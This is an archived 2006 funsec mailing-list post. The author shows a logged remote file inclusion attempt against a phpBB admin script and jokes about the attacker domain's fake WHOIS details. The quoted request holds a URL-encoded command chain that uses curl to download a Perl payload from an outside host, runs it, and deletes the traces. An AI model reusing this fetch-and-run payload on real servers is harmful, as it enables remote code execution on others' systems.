funsec mailing list archives

Previous By Date Next
Previous By Thread Next

I DONT HACK :-)

From: Peter Kosinar <goober () nuf ksp sk>
Date: Sat, 16 Sep 2006 21:49:05 +0200 (CEST)
Found a nice request in some of my logs recently (split into several lines in feeble attempt to improve readability): 

<somewhere>/modules/Forums/admin/admin_ug_auth.php?
phpbb_root_path=http://paradoxgaming.com/cmd.gif?&cmd=
cd%20/tmp;
mkdir%20.abc;
curl%20-o%20perl.gif%20http://paradoxgaming.com/perl.gif;
perl%20perl.gif;
rm%20-rf%20perl.gif;
rm%20perl.gif;
cd%20..;
rm%20-rf%20.abc;

^^^ = "sec"         VVV = "fun"

---- WHOIS for paradoxgaming.com:
   Domain Name.......... paradoxgaming.com
   Creation Date........ 2005-12-16
   Registration Date.... 2005-12-16
   Expiry Date.......... 2006-12-16
   Organisation Name.... I DONT HACK
   Organisation Address. 123 Fake Street
   Organisation Address.
   Organisation Address. Springfield
   Organisation Address. 3141
   Organisation Address. Antarctica
   Organisation Address. AUSTRALIA

   Admin Name........... I DONT HACK
   Admin Address........ 123 Fake Street
   Admin Address........
   Admin Address........ Springfield
   Admin Address........ 3141
   Admin Address........ Antarctica
   Admin Address........ AUSTRALIA
   Admin Email.......... idhhaha () gmail com
   Admin Phone.......... +61.400440033
   Admin Fax............
----

Peter
PS. Yes, I know the guy is most likely not -hacking-, he's probably been -hacked-... Though, one never knows :-) 

--
[Name] Peter Kosinar   [Quote] 2B | ~2B = exp(i*PI)   [ICQ] 134813278
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
Previous By Date Next
Previous By Thread Next

Current thread: